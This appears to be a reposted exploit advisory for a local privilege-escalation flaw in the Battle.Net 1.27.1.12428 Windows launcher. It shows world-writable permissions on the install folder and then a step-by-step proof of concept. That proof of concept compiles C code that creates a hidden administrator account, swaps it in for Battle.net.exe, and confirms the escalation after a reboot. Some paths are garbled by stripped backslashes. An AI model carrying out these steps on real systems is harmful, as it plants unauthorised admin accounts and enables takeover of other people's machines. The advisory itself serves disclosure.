Battle.Net 1.27.1.12428 – Insecure File Permissions
https://www.ispeech.org
# Exploit Title: Battle.Net 1.27.1.12428 - Insecure File Permissions
# Date: 2020-10-09
# Exploit Author: George Tsimpidas
# Software Link : https://www.blizzard.com/en-gb/download/ ( Battle Net Desktop )
# Version Patch: 1.27.1.12428
# Tested on: Microsoft Windows 10 Home 10.0.18362 N/A Build 18362
# Category: local
Vulnerability Description:
Battle.Net Launcher (Battle.net.exe) suffers from an elevation of
privileges
vulnerability which can be used by a simple user that can change the
executable file
with a binary of choice. The vulnerability exist due to the improper
permissions,
with the 'F' flag (Full) for 'Users' group, making the entire directory
'Battle.net' and its files and sub-dirs world-writable.
## Insecure Folder Permission
C:Program Files (x86)>icacls Battle.net
Battle.net BUILTINUsers:(OI)(CI)(F)
BUILTINAdministrators:(OI)(CI)(F)
CREATOR OWNER:(OI)(CI)(F)
## Insecure File Permission
C:Program Files (x86)Battle.net>icacls "Battle.net.exe"
Battle.net.exe BUILTINUsers:(I)(F)
BUILTINAdministrators:(I)(F)
FREY-OMEN30698:(I)(F)
## Local Privilege Escalation Proof of Concept
#0. Download & install
#1. Create low privileged user & change to the user
## As admin
C:>net user lowpriv Password123! /add
C:>net user lowpriv | findstr /i "Membership Name" | findstr /v "Full"
User name lowpriv
Local Group Memberships *Users
Global Group memberships *None
#2. Move the Service EXE to a new name
C:Program Files (x86)Battle.net> whoami
lowpriv
C:Program Files (x86)Battle.net> move Battle.net.exe Battle.frey.exe
1 file(s) moved.
#3. Create malicious binary on kali linux
## Add Admin User C Code
kali# cat addAdmin.c
int main(void){
system("net user placebo mypassword /add");
system("net localgroup Administrators placebo /add");
WinExec("C:\Program Files (x86)\Battle.net\Battle.frey.exe>",0);
return 0;
}
## Compile Code
kali# i686-w64-mingw32-gcc addAdmin.c -l ws2_32 -o Battle.net.exe
#4. Transfer created 'Battle.net.exe' to the Windows Host
#5. Move the created 'Battle.net.exe' binary to the 'C:Program Files
(x86)Battle.net>' Folder
C:Program Files (x86)Battle.net> move
C:UserslowprivDownloadsBattle.net.exe .
#6. Check that exploit admin user doesn't exists
C:Program Files (x86)Battle.net> net user placebo
The user name could not be found
#6. Reboot the Computer
C:Program Files (x86)Battle.net> shutdown /r
#7. Login & look at that new Admin
C:Userslowpriv>net user placebo | findstr /i "Membership Name" | findstr
/v "Full"
User name placebo
Local Group Memberships *Administrators *Users
Global Group memberships *None
Source link
Tagged with: 12428 • battle • BattleNet • File • insecure • local • permissions • windows
Gloss